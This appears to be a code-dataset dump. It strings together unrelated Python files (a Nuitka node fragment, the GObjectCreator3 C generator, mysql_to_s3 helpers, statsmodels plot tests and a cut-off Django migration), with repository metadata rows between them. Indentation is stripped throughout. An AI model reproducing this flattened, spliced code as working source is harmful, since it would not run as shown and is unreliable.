if type(value) is list:
value = tuple(value)
if self.checker is not None:
value = self.checker(value) # False alarm, pylint: disable=not-callable
# Re-parent value to us.
if type(value) is tuple:
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not value, value
setattr(self, attr_name, value)
def getChild(self, name):
# Only accept legal child names
attr_name = "subnode_" + name
return getattr(self, attr_name)
def getVisitableNodes(self):
# TODO: Consider if a generator would be faster.
attr_name = "subnode_" + self.named_child
value = getattr(self, attr_name)
if value is None:
return ()
elif type(value) is tuple:
return value
elif isinstance(value, NodeBase):
return (value,)
else:
raise AssertionError(self, "has illegal child", value, value.__class__)
def getVisitableNodesNamed(self):
"""Named children dictionary.
For use in debugging and XML output.
"""
attr_name = "subnode_" + self.named_child
value = getattr(self, attr_name)
yield self.named_child, value
def replaceChild(self, old_node, new_node):
if new_node is not None and not isinstance(new_node, NodeBase):
raise AssertionError(
"Cannot replace with", new_node, "old", old_node, "in", self
)
# Find the replaced node, as an added difficulty, what might be
# happening, is that the old node is an element of a tuple, in which we
# may also remove that element, by setting it to None.
key = self.named_child
value = self.getChild(key)
if value is None:
pass
elif type(value) is tuple:
if old_node in value:
if new_node is not None:
self.setChild(
key,
tuple(
(val if val is not old_node else new_node) for val in value
),
)
else:
self.setChild(
key, tuple(val for val in value if val is not old_node)
)
return key
elif isinstance(value, NodeBase):
if old_node is value:
self.setChild(key, new_node)
return key
else:
assert False, (key, value, value.__class__)
raise AssertionError("Didn't find child", old_node, "in", self)
def getCloneArgs(self):
# Make clones of child nodes too.
values = {}
key = self.named_child
value = self.getChild(key)
assert type(value) is not list, key
if value is None:
values[key] = None
elif type(value) is tuple:
values[key] = tuple(v.makeClone() for v in value)
else:
values[key] = value.makeClone()
values.update(self.getDetails())
return values
def finalize(self):
del self.parent
attr_name = "subnode_" + self.named_child
child = getattr(self, attr_name)
if child is not None:
child.finalize()
delattr(self, attr_name)
class SideEffectsFromChildrenMixin(object):
# Mixins are not allow to specify slots.
__slots__ = ()
def mayHaveSideEffects(self):
for child in self.getVisitableNodes():
if child.mayHaveSideEffects():
return True
return False
def extractSideEffects(self):
# No side effects at all but from the children.
result = []
for child in self.getVisitableNodes():
result.extend(child.extractSideEffects())
return tuple(result)
def computeExpressionDrop(self, statement, trace_collection):
# Expression only statement plays no role, pylint: disable=unused-argument
side_effects = self.extractSideEffects()
# TODO: Have a method for nicer output and remove existing overloads
# by using classes and prefer generic implementation here.
if side_effects:
return (
makeStatementOnlyNodesFromExpressions(side_effects),
"new_statements",
"Lowered unused expression %s to its side effects." % self.kind,
)
else:
return (
None,
"new_statements",
"Removed %s without side effects." % self.kind,
)
def makeChild(provider, child, source_ref):
child_type = child.attrib.get("type")
if child_type == "list":
return [
fromXML(provider=provider, xml=sub_child, source_ref=source_ref)
for sub_child in child
]
elif child_type == "none":
return None
else:
return fromXML(provider=provider, xml=child[0], source_ref=source_ref)
def getNodeClassFromKind(kind):
return NodeCheckMetaClass.kinds[kind]
def extractKindAndArgsFromXML(xml, source_ref):
kind = xml.attrib["kind"]
args = dict(xml.attrib)
del args["kind"]
if source_ref is None:
source_ref = SourceCodeReference.fromFilenameAndLine(
args["filename"], int(args["line"])
)
del args["filename"]
del args["line"]
else:
source_ref = source_ref.atLineNumber(int(args["line"]))
del args["line"]
node_class = getNodeClassFromKind(kind)
return kind, node_class, args, source_ref
def fromXML(provider, xml, source_ref=None):
assert xml.tag == "node", xml
kind, node_class, args, source_ref = extractKindAndArgsFromXML(xml, source_ref)
if "constant" in args:
# TODO: Try and reduce/avoid this, use marshal and/or pickle from a file
# global stream instead. For now, this will do. pylint: disable=eval-used
args["constant"] = eval(args["constant"])
if kind in (
"ExpressionFunctionBody",
"PythonMainModule",
"PythonCompiledModule",
"PythonCompiledPackage",
"PythonInternalModule",
):
delayed = node_class.named_children
if "code_flags" in args:
args["future_spec"] = fromFlags(args["code_flags"])
else:
delayed = ()
for child in xml:
assert child.tag == "role", child.tag
child_name = child.attrib["name"]
# Might want to want until provider is updated with some
# children. In these cases, we pass the XML node, rather
# than a Nuitka node.
if child_name not in delayed:
args[child_name] = makeChild(provider, child, source_ref)
else:
args[child_name] = child
try:
return node_class.fromXML(provider=provider, source_ref=source_ref, **args)
except (TypeError, AttributeError):
Tracing.printLine(node_class, args, source_ref)
raise
| apache-2.0 | 8,789,145,488,713,669,000 | 28.308013 | 88 | 0.594856 | false |
ThomasBollmeier/GObjectCreator3 | src/gobjcreator3/codegen/c_code_generator.py | 1 | 29821 | from gobjcreator3.codegen.code_generator import CodeGenerator
from gobjcreator3.codegen.output import StdOut
from gobjcreator3.codegen.name_creator import NameCreator
from gobjcreator3.codegen.c_marshaller_generator import CMarshallerGenerator, CMarshallerNameCreator
from gobjcreator3.model.type import Type
from gobjcreator3.model.visibility import Visibility
from gobjcreator3.model.method import Parameter
from gobjcreator3.model.property import PropType, PropAccess
from gobjcreator3.model.ginterface import GInterface
import os
import re
import faberscriptorum
class CGenConfig(object):
def __init__(self):
self.generate_base_functions = False
self.generate_constructor = False
self.generate_setter_getter = False
self.verbose = False
self.header_text_file = ""
self.directory_per_module = True
class CCodeGenerator(CodeGenerator):
def __init__(self, root_module, origin, out=StdOut(), config=CGenConfig()):
CodeGenerator.__init__(self, root_module, origin, out)
self._config = config
self._dir_stack = []
self._cur_dir = ""
self._name_creator = NameCreator()
self._template_dir = os.path.dirname(__file__) + os.sep + "templates" + os.sep + "c"
self._refresh_template_processor()
self._regex_type_w_ptrs = re.compile(r"(\w+)(\s*)(\*+)")
def generate(self):
self._generate_module(self._root_module)
def _generate_module(self, module):
if self._config.directory_per_module:
if self._cur_dir:
self._cur_dir += os.sep + module.name
else:
self._cur_dir = module.name
self._dir_stack.append(self._cur_dir)
self._out.enter_dir(self._cur_dir)
for m in module.modules:
self._generate_module(m)
self._refresh_template_processor()
self._setup_module_symbols(module)
objs = [obj for obj in module.objects if obj.filepath_origin == self._origin]
for obj in objs:
self._setup_gobject_symbols(obj)
self._gen_object_header(obj)
self._gen_object_prot_header(obj)
self._gen_object_source(obj)
if obj.has_signals():
self._gen_object_marshallers(obj)
intfs = [intf for intf in module.interfaces if intf.filepath_origin == self._origin]
for intf in intfs:
self._setup_ginterface_symbols(intf)
self._gen_interface_header(intf)
self._gen_interface_source(intf)
if intf.signals:
self._gen_object_marshallers(intf)
enums = [enum for enum in module.enumerations if enum.filepath_origin == self._origin]
for enum in enums:
self._setup_genum_symbols(enum)
self._gen_enum_header(enum)
self._gen_enum_source(enum)
all_flags = [flags for flags in module.flags if flags.filepath_origin == self._origin]
for flags in all_flags:
self._setup_gflags_symbols(flags)
self._gen_flags_header(flags)
self._gen_flags_source(flags)
error_domains = [error_domain for error_domain in module.error_domains if error_domain.filepath_origin == self._origin]
for error_domain in error_domains:
self._setup_gerror_symbols(error_domain)
self._gen_error_header(error_domain)
if self._config.directory_per_module:
self._out.exit_dir(self._cur_dir)
self._dir_stack.pop()
if self._dir_stack:
self._cur_dir = self._dir_stack[-1]
else:
self._cur_dir = ""
def _gen_object_header(self, obj):
file_path = self._full_path(self._name_creator.create_obj_header_name(obj))
lines = self._get_lines_from_template("gobject_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_prot_header(self, obj):
if not obj.has_protected_members() and obj.is_final:
return
file_path = self._full_path(self._name_creator.create_obj_prot_header_name(obj))
lines = self._get_lines_from_template("gobject_header_prot.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_source(self, obj):
file_path = self._full_path(self._name_creator.create_obj_source_name(obj))
lines = self._get_lines_from_template("gobject_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_interface_header(self, intf):
file_path = self._full_path(self._name_creator.create_obj_header_name(intf))
lines = self._get_lines_from_template("ginterface_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_interface_source(self, intf):
file_path = self._full_path(self._name_creator.create_obj_source_name(intf))
lines = self._get_lines_from_template("ginterface_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_object_marshallers(self, clif):
is_interface = isinstance(clif, GInterface)
header_guard = "__"
modprefix = self._template_processor.getSymbol("MODULE_PREFIX")
if modprefix:
header_guard += modprefix + "_"
if not is_interface:
header_guard += self._template_processor.getSymbol("CLASS_NAME")
else:
header_guard += self._template_processor.getSymbol("INTF_NAME")
header_guard += "_MARSHALLER_H__"
if not is_interface:
prefix = self._template_processor.getSymbol("class_prefix")
else:
prefix = self._template_processor.getSymbol("intf_prefix")
signals = clif.get_signals()
generator = CMarshallerGenerator(
self._header_comment(),
header_guard,
prefix,
signals,
self._out
)
header_file_path = self._full_path(self._name_creator.create_obj_marshaller_header_name(clif))
if self._config.verbose:
print("generating %s..." % header_file_path, end="")
generator.generate_header(header_file_path)
if self._config.verbose:
print("done")
source_file_path = self._full_path(self._name_creator.create_obj_marshaller_source_name(clif))
if self._config.verbose:
print("generating %s..." % source_file_path, end="")
generator.generate_source(source_file_path)
if self._config.verbose:
print("done")
def _gen_enum_header(self, enum):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(enum) + ".h")
lines = self._get_lines_from_template("genum_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_enum_source(self, enum):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(enum) + ".c")
lines = self._get_lines_from_template("genum_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_flags_header(self, flags):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(flags) + ".h")
lines = self._get_lines_from_template("gflags_header.template", file_path)
self._create_text_file(file_path, lines)
def _gen_flags_source(self, flags):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(flags) + ".c")
lines = self._get_lines_from_template("gflags_source.template", file_path)
self._create_text_file(file_path, lines)
def _gen_error_header(self, error_domain):
file_path = self._full_path(self._name_creator.create_filename_wo_suffix(error_domain) + ".h")
lines = self._get_lines_from_template("gerror_header.template", file_path)
self._create_text_file(file_path, lines)
def _full_path(self, basename):
if self._cur_dir:
return self._cur_dir + os.sep + basename
else:
return basename
def _create_text_file(self, file_path, lines):
if self._config.verbose:
print("generating %s..." % file_path, end="")
self._out.visit_text_file(file_path, lines)
if self._config.verbose:
print("done")
def _get_lines_from_template(self, template_file, file_path):
self._out.prepare_file_creation(file_path, self._template_processor)
template_path = self._template_dir + os.sep + template_file
template_path = os.path.abspath(template_path)
out_buffer = self._template_processor.createStringOut()
self._template_processor.createCode(template_path, out_buffer)
lines = out_buffer.content.split(os.linesep)
# Remove adjacent empty lines:
res = []
prev = None
for line in lines:
line = line.rstrip()
if line:
res.append(line)
else:
if prev is None or prev:
res.append(line)
prev = line
return res
def _refresh_template_processor(self):
self._template_processor = faberscriptorum.API()
self._template_processor.setEditableSectionStyle(self._template_processor.Language.C)
self._template_processor.setIncludePath([self._template_dir])
self._template_processor["header_comment"] = self._header_comment()
self._template_processor["config"] = self._config
self._template_processor["TRUE"] = True
self._template_processor["FALSE"] = False
self._template_processor["PUBLIC"] = Visibility.PUBLIC
self._template_processor["PROTECTED"] = Visibility.PROTECTED
self._template_processor["PRIVATE"] = Visibility.PRIVATE
self._template_processor["OBJECT"] = Type.OBJECT
self._template_processor["INTERFACE"] = Type.INTERFACE
self._template_processor["type_name"] = self._name_creator.create_full_type_name
self._template_processor["TYPE_MACRO"] = self._name_creator.create_type_macro
self._template_processor["CAST_MACRO"] = self._name_creator.create_cast_macro
self._template_processor["increment"] = self._increment
self._template_processor["is_empty"] = self._is_empty
self._template_processor["is_none"] = self._is_none
self._template_processor["literal_trim"] = self._literal_trim
self._template_processor["length"] = self._length
self._template_processor["to_upper"] = self._to_upper
self._template_processor["to_lower"] = self._to_lower
self._template_processor["rearrange_asterisk"] = self._rearrange_asterisk
self._template_processor["method_basename"] = self._method_basename
self._template_processor["method_result"] = self._method_result
self._template_processor["method_signature"] = self._method_signature
self._template_processor["method_signature_by_name"] = self._method_signature_by_name
self._template_processor["method_by_name"] = self._method_by_name
self._template_processor["method_call_args"] = self._method_call_args
self._template_processor["method_def_class"] = self._method_def_class
self._template_processor["method_def_class_cast"] = self._method_def_class_cast
def _setup_module_symbols(self, module):
camel_case_prefix = module.name.capitalize()
curmod = module
while curmod.module:
curmod = curmod.module
if curmod.name:
camel_case_prefix = curmod.name.capitalize() + camel_case_prefix
prefix = self._name_creator.replace_camel_case(camel_case_prefix, "_")
self._template_processor["module_prefix"] = self._module_prefix(module)
self._template_processor["MODULE_PREFIX"] = prefix.upper()
self._template_processor["ModulePrefix"] = camel_case_prefix
self._template_processor["filename_wo_suffix"] = self._name_creator.create_filename_wo_suffix
def _setup_gobject_symbols(self, obj):
self._template_processor["class"] = obj
self._template_processor["ClassName"] = obj.name
self._template_processor["CLASS_NAME"] = self._name_creator.replace_camel_case(obj.name, "_").upper()
self._template_processor["FullClassName"] = self._template_processor.getSymbol("ModulePrefix") + obj.name
prefix = obj.cfunc_prefix or self._name_creator.replace_camel_case(obj.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["class_prefix"] = prefix
self._template_processor["protected_header"] = self._name_creator.create_obj_prot_header_name
self._template_processor["marshaller_header"] = self._name_creator.create_obj_marshaller_header_name
self._template_processor["hasProtectedMembers"] = obj.has_protected_members()
self._template_processor["PROP_NAME"] = self._name_creator.create_property_enum_value
self._template_processor["prop_tech_name"] = self._name_creator.create_property_tech_name
self._template_processor["PropType"] = PropType
self._template_processor["PropAccess"] = PropAccess
self._template_processor["prop_value"] = self._property_value
self._template_processor["prop_gtype"] = self._property_gtype
self._template_processor["prop_flags"] = self._property_flags
self._template_processor["prop_setter_section"] = self._property_setter_section
self._template_processor["prop_getter_section"] = self._property_getter_section
self._template_processor["prop_set_section"] = self._property_setter_section
self._template_processor["prop_get_section"] = self._property_getter_section
self._template_processor["is_prop_init_required"] = self._is_property_init_required
self._template_processor["signal_tech_name"] = self._signal_technical_name
self._template_processor["signal_section_defhandler"] = self._signal_section_defhandler
if obj.has_signals():
self._marshaller_names = CMarshallerNameCreator(prefix)
self._template_processor["marshaller_func"] = self._marshaller_names.create_marshaller_name
else:
self._marshaller_names = None
self._template_processor["interface_impl_funcname"] = self._interface_impl_funcname
def _setup_ginterface_symbols(self, intf):
self._template_processor["intf"] = intf
self._template_processor["INTF_NAME"] = self._name_creator.replace_camel_case(intf.name, "_").upper()
prefix = intf.cfunc_prefix or self._name_creator.replace_camel_case(intf.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["intf_prefix"] = prefix
if intf.signals:
self._marshaller_names = CMarshallerNameCreator(prefix)
self._template_processor["marshaller_func"] = self._marshaller_names.create_marshaller_name
else:
self._marshaller_names = None
def _setup_genum_symbols(self, enum):
self._template_processor["enum"] = enum
self._template_processor["ENUM_NAME"] = self._name_creator.replace_camel_case(enum.name, "_").upper()
self._template_processor["FullEnumName"] = self._template_processor.getSymbol("ModulePrefix") + enum.name
prefix = self._name_creator.replace_camel_case(enum.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["enum_prefix"] = prefix
def _setup_gflags_symbols(self, flags):
self._template_processor["flags"] = flags
prefix = self._name_creator.replace_camel_case(flags.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["flags_prefix"] = prefix
def _setup_gerror_symbols(self, error_domain):
self._template_processor["error_domain"] = error_domain
prefix = self._name_creator.replace_camel_case(error_domain.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["error_domain_prefix"] = prefix
def _header_comment(self):
if not self._config.header_text_file:
return """/*
* This file has been automatically generated by GObjectCreator3
* (see https://github.com/ThomasBollmeier/GObjectCreator3 for details)
*/
"""
else:
res = ""
f = open(self._config.header_text_file)
lines = f.readlines()
f.close
for line in lines:
res += line
return res
def _increment(self, value):
return value + 1
def _is_empty(self, data):
return bool(data) == False
def _is_none(self, data):
return data is None
def _to_upper(self, text):
return text.upper()
def _to_lower(self, text):
return text.lower()
def _literal_trim(self, text):
if len(text) > 2:
return text[1:-1]
else:
return ""
def _length(self, data):
try:
return len(data)
except TypeError as error:
raise error
def _method_result(self, method):
result_type = "void"
for p in method.parameters:
type_name = self._name_creator.create_full_type_name(p.type)
if isinstance(p.type, Type) and ( p.type.category == Type.OBJECT or p.type.category == Type.INTERFACE ):
type_name += "*"
if "const" in p.modifiers:
type_name = "const " + type_name
if p.direction == Parameter.OUT:
result_type = type_name
break
return self._rearrange_asterisk(result_type)
def _method_basename(self,
cls,
method_info
):
method_or_name, intf = method_info
if not isinstance(method_or_name, str):
res = method_or_name.name
else:
res = method_or_name
if intf:
method_prefix = intf.cfunc_prefix or intf.name.lower()
mod_prefix = self._module_prefix_relative(intf.module, cls.module)
if mod_prefix:
method_prefix = mod_prefix + "_" + method_prefix
res = method_prefix + "_" + res
return res
def _method_signature(self,
cls,
method,
suppress_param_names=False,
insert_line_breaks=True,
indent_level=1,
instance_name="self"
):
res = ""
params = []
for p in method.parameters:
type_name = self._name_creator.create_full_type_name(p.type)
if isinstance(p.type, Type) and ( p.type.category == Type.OBJECT or p.type.category == Type.INTERFACE ):
type_name += "*"
if "const" in p.modifiers:
type_name = "const " + type_name
if p.direction != Parameter.OUT:
params.append((type_name, p.name))
if not method.is_static:
cls_type = self._name_creator.create_full_type_name(cls)
params.insert(0, (cls_type + "*", instance_name))
if len(params) == 0:
res = "void"
elif len(params) == 1:
res = params[0][0]
if not suppress_param_names:
res = self._rearrange_asterisk(res, params[0][1])
else:
for param in params:
if res:
res += ", "
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
typename = param[0]
if not suppress_param_names:
res += self._rearrange_asterisk(typename, param[1])
else:
res += typename
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
return res
def _method_call_args(self,
method,
insert_line_breaks = True,
indent_level = 1,
instance_name = "self"
):
args = [p.name for p in method.parameters if p.direction != Parameter.OUT]
if not method.is_static:
args.insert(0, instance_name)
num_args = len(args)
if num_args == 0:
res = ""
elif num_args == 1:
res = args[0]
else:
res = ""
for arg in args:
if res:
res += ","
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
res += arg
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
return res
def _method_signature_by_name(self,
cls,
method_name,
suppress_param_names=False,
insert_line_breaks=True,
indent_level=1,
instance_name="self"
):
minfo = cls.get_method_info(method_name)
return self._method_signature(
minfo.def_origin,
minfo.method,
suppress_param_names,
insert_line_breaks,
indent_level,
instance_name
)
def _method_by_name(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
return minfo.method
def _method_def_class(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
if minfo:
return minfo.def_origin
else:
raise Exception("No class found for method '%s'" % method_name)
def _method_def_class_cast(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
defcls = minfo.def_origin
class_name = self._name_creator.replace_camel_case(defcls.name, "_").upper()
module_prefix = ""
module = defcls.module
while module and module.name:
if module_prefix:
module_prefix = "_" + module_prefix
module_prefix = module.name.upper() + module_prefix
module = module.module
res = class_name + "_CLASS"
if module_prefix:
res = module_prefix + "_" + res
return res
def _signal_technical_name(self, signal):
return signal.name.replace("-", "_")
def _signal_section_defhandler(self, signal):
return "default_handler_" + self._signal_technical_name(signal)
def _rearrange_asterisk(self, typename, parname=None):
match = self._regex_type_w_ptrs.match(typename)
if match:
if parname:
typename = match.group(1)
parname = match.group(3) + parname
else:
typename = match.group(1) + " " + match.group(3)
if parname:
return typename + " " + parname
else:
return typename
def _property_flags(self, prop):
flags = ""
for access_mode in prop.access:
if flags:
flags += "|"
flags += {
PropAccess.READ: "G_PARAM_READABLE",
PropAccess.WRITE: "G_PARAM_WRITABLE",
PropAccess.INIT: "G_PARAM_CONSTRUCT",
PropAccess.INIT_ONLY: "G_PARAM_CONSTRUCT_ONLY"
}[access_mode]
return flags
def _property_value(self, val):
if val.literal:
return val.literal
elif val.number_info:
if not val.number_info.decimals:
return "%d" % val.number_info.digits
else:
return "%d.%d" % (val.number_info.digits, val.number_info.decimals)
elif val.code_info:
enum_name = self._name_creator.create_full_type_name(val.code_info.enumeration)
enum_name = self._name_creator.replace_camel_case(enum_name, "_").upper()
return enum_name + "_" + val.code_info.code_name
elif val.boolean is not None:
return val.boolean and "TRUE" or "FALSE"
def _property_gtype(self, gtype_value):
if gtype_value.gtype_id:
return gtype_value.gtype_id
else:
return self._name_creator.create_type_macro(gtype_value.type)
def _property_setter_section(self, prop):
return "setter_" + prop.name.replace("-", "_").lower()
def _property_getter_section(self, prop):
return "getter_" + prop.name.replace("-", "_").lower()
def _property_set_section(self, prop):
return "set_" + prop.name.replace("-", "_").lower()
def _property_get_section(self, prop):
return "get_" + prop.name.replace("-", "_").lower()
def _interface_impl_funcname(self, cls, intf, method_name):
method_prefix = intf.cfunc_prefix or intf.name.lower()
module_predix = self._module_prefix_relative(intf.module, cls.module)
if module_predix:
method_prefix = module_predix + "_" + method_prefix
return method_prefix + "_" + method_name
def _is_property_init_required(self, obj):
if obj.get_properties():
return True
for intf in obj.interfaces:
if intf.properties:
return True
return False
def _module_prefix(self, module):
res = module.cfunc_prefix or module.name.lower()
curmod = module
while curmod.module:
curmod = curmod.module
tmp = curmod.cfunc_prefix or curmod.name.lower()
if tmp:
res = tmp + "_" + res
return res
def _module_prefix_relative(self, module, root):
res = ""
abspath_module = self._get_abs_module_path(module)
abspath_root = self._get_abs_module_path(root)
len_rootpath = len(abspath_root)
relpath = []
for idx, m in enumerate(abspath_module):
if not relpath and idx < len_rootpath and m == abspath_root[idx]:
continue
relpath.append(m)
for m in relpath:
if res:
res += "_"
res += m.cfunc_prefix or m.name.lower()
return res
def _get_abs_module_path(self, module):
res = [module]
curmod = module
while curmod.module:
curmod = curmod.module
res.insert(0, curmod)
return res
| apache-2.0 | 763,292,699,945,116,500 | 36.464824 | 127 | 0.539653 | false |
klahnakoski/MySQL-to-S3 | mysql_to_s3/__init__.py | 1 | 1965 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski ([email protected])
#
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from mo_dots import wrap
from mo_logs import strings
from pyLibrary.aws import s3
def _key2etl(key):
"""
CONVERT S3 KEY TO ETL HEADER
S3 NAMING CONVENTION: a.b.c WHERE EACH IS A STEP IN THE ETL PROCESS
HOW TO DEAL WITH a->b AS AGGREGATION? b:a.c? b->c is agg: a.c:b
"""
key = s3.strip_extension(key)
tokens = []
s = 0
i = strings.find(key, [":", "."])
while i < len(key):
tokens.append(key[s:i])
tokens.append(key[i])
s = i + 1
i = strings.find(key, [":", "."], s)
tokens.append(key[s:i])
_reverse_aggs(tokens)
# tokens.reverse()
source = {
"id": format_id(tokens[0])
}
for i in range(2, len(tokens), 2):
source = {
"id": format_id(tokens[i]),
"source": source,
"type": "join" if tokens[i - 1] == "." else "agg"
}
return wrap(source)
def _reverse_aggs(seq):
# SHOW AGGREGATION IN REVERSE ORDER (ASSUME ONLY ONE)
for i in range(1, len(seq), 2):
if seq[i] == ":":
seq[i - 1], seq[i + 1] = seq[i + 1], seq[i - 1]
def format_id(value):
"""
:param value:
:return: int() IF POSSIBLE
"""
try:
return int(value)
except Exception:
return unicode(value)
def lt(l, r):
"""
:param l: left key
:param r: right key
:return: True if l<r
"""
if r is None or l is None:
return True
for ll, rr in zip(l, r):
if ll < rr:
return True
elif ll > rr:
return False
return False
| mpl-2.0 | 562,157,114,475,749,760 | 21.586207 | 75 | 0.553181 | false |
pprett/statsmodels | statsmodels/graphics/tests/test_functional.py | 1 | 2742 | import numpy as np
from numpy.testing import dec, assert_equal, assert_almost_equal
from statsmodels.graphics.functional import \
banddepth, fboxplot, rainbowplot
try:
import matplotlib.pyplot as plt
have_matplotlib = True
except:
have_matplotlib = False
def test_banddepth_BD2():
xx = np.arange(500) / 150.
y1 = 1 + 0.5 * np.sin(xx)
y2 = 0.3 + np.sin(xx + np.pi/6)
y3 = -0.5 + np.sin(xx + np.pi/6)
y4 = -1 + 0.3 * np.cos(xx + np.pi/6)
data = np.asarray([y1, y2, y3, y4])
depth = banddepth(data, method='BD2')
expected_depth = [0.5, 5./6, 5./6, 0.5]
assert_almost_equal(depth, expected_depth)
## Plot to visualize why we expect this output
#fig = plt.figure()
#ax = fig.add_subplot(111)
#for ii, yy in enumerate([y1, y2, y3, y4]):
# ax.plot(xx, yy, label="y%s" % ii)
#ax.legend()
#plt.show()
def test_banddepth_MBD():
xx = np.arange(5001) / 5000.
y1 = np.zeros(xx.shape)
y2 = 2 * xx - 1
y3 = np.ones(xx.shape) * 0.5
y4 = np.ones(xx.shape) * -0.25
data = np.asarray([y1, y2, y3, y4])
depth = banddepth(data, method='MBD')
expected_depth = [5./6, (2*(0.75-3./8)+3)/6, 3.5/6, (2*3./8+3)/6]
assert_almost_equal(depth, expected_depth, decimal=4)
@dec.skipif(not have_matplotlib)
def test_fboxplot_rainbowplot():
"""Test fboxplot and rainbowplot together, is much faster."""
def harmfunc(t):
"""Test function, combination of a few harmonic terms."""
# Constant, 0 with p=0.9, 1 with p=1 - for creating outliers
ci = int(np.random.random() > 0.9)
a1i = np.random.random() * 0.05
a2i = np.random.random() * 0.05
b1i = (0.15 - 0.1) * np.random.random() + 0.1
b2i = (0.15 - 0.1) * np.random.random() + 0.1
func = (1 - ci) * (a1i * np.sin(t) + a2i * np.cos(t)) + \
ci * (b1i * np.sin(t) + b2i * np.cos(t))
return func
np.random.seed(1234567)
# Some basic test data, Model 6 from Sun and Genton.
t = np.linspace(0, 2 * np.pi, 250)
data = []
for ii in range(20):
data.append(harmfunc(t))
# fboxplot test
fig = plt.figure()
ax = fig.add_subplot(111)
_, depth, ix_depth, ix_outliers = fboxplot(data, wfactor=2, ax=ax)
ix_expected = np.array([13, 4, 15, 19, 8, 6, 3, 16, 9, 7, 1, 5, 2,
12, 17, 11, 14, 10, 0, 18])
assert_equal(ix_depth, ix_expected)
ix_expected2 = np.array([2, 11, 17, 18])
assert_equal(ix_outliers, ix_expected2)
plt.close(fig)
# rainbowplot test (re-uses depth variable)
xdata = np.arange(data[0].size)
fig = rainbowplot(data, xdata=xdata, depth=depth, cmap=plt.cm.rainbow)
plt.close(fig)
| bsd-3-clause | 247,066,859,032,231,900 | 29.466667 | 74 | 0.574398 | false |
gamnor/olhoneles | montanha/migrations/0007_auto__add_pernaturebyyear__add_pernature.py | 1 | 10393 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'PerNatureByYear'
db.create_table(u'montanha_pernaturebyyear', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('institution', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Institution'])),
('year', self.gf('django.db.models.fields.IntegerField')()),
('nature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.ExpenseNature'])),
('expensed', self.gf('django.db.models.fields.DecimalField')(max_digits=10, decimal_places=2)),
))
db.send_create_signal(u'montanha', ['PerNatureByYear'])
# Adding model 'PerNature'
db.create_table(u'montanha_pernature', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('institution', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Institution'])),
('legislature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Legislature'], null=True, blank=True)),
('date_start', self.gf('django.db.models.fields.DateField')()),
('date_end', self.gf('django.db.models.fields.DateField')()),
('nature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.ExpenseNature'])),
('expensed', self.gf('django.db.models.fields.DecimalField')(max_digits=10, decimal_places=2)),
))
db.send_create_signal(u'montanha', ['PerNature'])
def backwards(self, orm):
# Deleting model 'PerNatureByYear'
db.delete_table(u'montanha_pernaturebyyear')
# Deleting model 'PerNature'
db.delete_table(u'montanha_pernature')
models = {
u'montanha.archivedexpense': {
'Meta': {'object_name': 'ArchivedExpense'},
'collection_run': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.CollectionRun']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mandate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Mandate']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Supplier']"}),
'value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'})
},
u'montanha.collectionrun': {
'Meta': {'object_name': 'CollectionRun'},
'date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']"})
},
